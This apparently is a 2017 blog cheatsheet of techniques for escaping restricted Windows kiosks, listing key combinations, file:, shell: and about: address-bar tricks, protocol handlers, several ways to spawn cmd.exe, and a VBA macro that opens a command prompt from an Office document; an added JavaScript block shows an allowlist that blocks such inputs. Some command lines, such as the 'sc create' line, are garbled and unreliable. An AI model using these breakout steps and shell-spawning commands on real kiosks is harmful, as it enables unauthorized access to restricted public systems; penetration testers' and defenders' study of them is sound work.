Saturday, 09 December 2017

Kiosk Breakout Cheatsheet

Things to try to escape the kiosk (from HitThemLow):

CTRL-SHIFT-ESC Task manager
ALT-TAB Switch Task
CTRL-ALT-DELETE Task Manager
SHIFT*5 Sticky Keys
ALT-F4 Close application
Windows Key Start menu

In the browser:
File:/C:/windows
File:/C:\windows\
File:/C:\windows/
File:/C:/windows
File://C:/windows
File://C:\windows/
file://C:\windows
C:/windows
C:\windows\
C:\windows
C:/windows/
C:/windows\
%WINDIR%
%TMP%
%TEMP%
%SYSTEMDRIVE%
%SYSTEMROOT%
%APPDATA%
%HOMEDRIVE%
%HOMESHARE%

Key combos for use in the browser:
CTRL-B, CTRL-I Favourites
CTRL-H History
CTRL-L, CTRL-O File/Open Dialog
CTRL-P Print Dialog
CTRL-S Save As

Mash the keyboard to try and find others that may be hidden (admin menus)

Use the "about" protocol to try and access things:
about:<input%20type=file>
about:<a%20href=C:\windows\>Click-Here</a>

Use the "shell" protocol to access executables:
Shell:Profile
Shell:ProgramFiles
Shell:System
Shell:ControlPanelFolder
Shell:Windows
shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D} //Windows Control Panel ClassID

Don't forget iKat!!


Javashells and the res: protocol are good :)

Other protos to try:

Callto://
Gopher://
HCP://
Telnet://
TN3270://
Rlogin://
LDAP://
News://
Mailto://
MMS://
SKYPE://
SIP://
Play://
Steam://
Quicktime://
smb://
ftp://

You can use HCP to spawn a cmd.exe

You can embed files in .doc files and kiosks don't usually stop that ;)

More things:
Jython Shell
Java applets
ActiveX (object.execute('cmd.exe'))
.NET CLR
flash filereference()

Notepad can open remote files

Other ways to spawn a shell
cmd.exe
command.com
win.com
Loadfix.com start.exe
sc create testsvc binpath= loadfix.com cmd.exe loadfix.com command.com
"cmd /K start type= own cmd start" type type= interact
start loadfix.com cmd.exe
start loadfix.com
start loadfix.com %COMSPEC%

Also, Firefox: if you want to make quick and dirty HTML, use the address bar like:
data:text/html,Click-Here</a>
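
The address-bar inputs listed on this page (local paths, %VAR% references, and the file:, about:, shell:, data: and other protocol handlers) have one thing in common: none is an https URL on the kiosk's approved site. A sketch of the allowlist check a kiosk browser wrapper can apply before navigating, added here as an example and not part of the original cheatsheet; checkNavigation, audit and the host kiosk.example.com are assumed names:

```javascript
// Added example: allowlist check for text typed into a kiosk address bar.
// ALLOWED_HOSTS, checkNavigation and audit are hypothetical names.
const ALLOWED_SCHEMES = new Set(["https:"]);
const ALLOWED_HOSTS = new Set(["kiosk.example.com"]); // assumption: the one approved site

function checkNavigation(input) {
  const text = String(input).trim();
  // A leading %VAR% reference (%WINDIR%, %TEMP% ...) is never a valid web URL.
  if (/^%[^%\s]+%/.test(text)) return { allow: false, reason: "env-variable" };
  // Drive-letter paths must be caught before parsing: the URL parser would
  // otherwise read "C:/windows" as a URL whose scheme is "c:".
  if (/^[A-Za-z]:([\\/]|$)/.test(text)) return { allow: false, reason: "local-path" };
  let url;
  try {
    url = new URL(text);
  } catch {
    return { allow: false, reason: "not-a-url" };
  }
  // The parser lowercases the scheme, so "File:" and "Shell:" compare as expected.
  if (!ALLOWED_SCHEMES.has(url.protocol)) {
    return { allow: false, reason: "scheme " + url.protocol };
  }
  if (!ALLOWED_HOSTS.has(url.hostname)) {
    return { allow: false, reason: "host " + url.hostname };
  }
  return { allow: true, reason: "ok" };
}

// Constructed samples: strings from the lists on this page plus three controls.
const SAMPLES = [
  "File:/C:/windows", "C:\\windows\\", "C:/windows", "%WINDIR%",
  "about:<input%20type=file>", "Shell:System", "HCP://", "data:text/html,x",
  "https://kiosk.example.com/start",   // control: approved site
  "http://kiosk.example.com/start",    // control: wrong scheme
  "https://other.example/",            // control: wrong host
];

// Returns one verdict per input, suitable for logging or alerting on blocks.
function audit(samples) {
  return samples.map((s) => ({ input: s, ...checkNavigation(s) }));
}

for (const r of audit(SAMPLES)) {
  console.log(r.allow ? "ALLOW" : "BLOCK", r.input, "-", r.reason);
}
```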


also note to self, don't forget

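Sub macro1()
'
' shell Macro: launches a program from an Office document with VBA's Shell function
'
    Dim sPath As String
    Dim retVal As Variant
    sPath = "c:\windows"
    ' Alternative: open Explorer at sPath instead of a command prompt
    'retVal = Shell("explorer.exe " & sPath, vbNormalFocus)
    retVal = Shell("C:\windows\system32\cmd.exe", vbNormalFocus)
End Sub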